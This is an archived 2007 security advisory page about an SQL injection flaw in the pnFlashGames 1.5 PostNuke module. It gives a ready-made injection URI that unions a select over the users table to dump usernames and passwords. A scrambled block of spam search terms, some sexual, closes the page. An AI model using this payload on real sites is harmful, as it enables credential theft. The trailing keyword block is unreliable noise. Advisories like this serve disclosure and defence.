about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability


Title PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
Published 2007-04-28-12:00AM
Updated 2007-04-30-09:40PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  xoron is credited with the discovery of this vulnerability.
Vulnerable  pnFlashGames pnFlashGames 1.5
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 00:39:00 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c Sms celip a...html/p AG-Spider www.p0551. tamil hero Dynix Hori www.loveco PHP-Nuke C www.qqk9.c www.sexwop gforge La belleza news for C exploits f www.taolov CMS is Fre 200 /compo news for c www.ctlu.c all cartoo nude babe slieny.com www.usahua www.taobao vBulletin Www.video apache 1.3 Www.Bolly www.sbaobe arbain sex nayanthara WWW SEXMO Limp bizki phpBB+SQL+ search/exp IP.Board 2 Crack Data scanner bu 200 /compo %2Fcompone bigtites explorer E powerpoint semmshow.c zufang.051 www.yw2yua paly sex c Big black PEE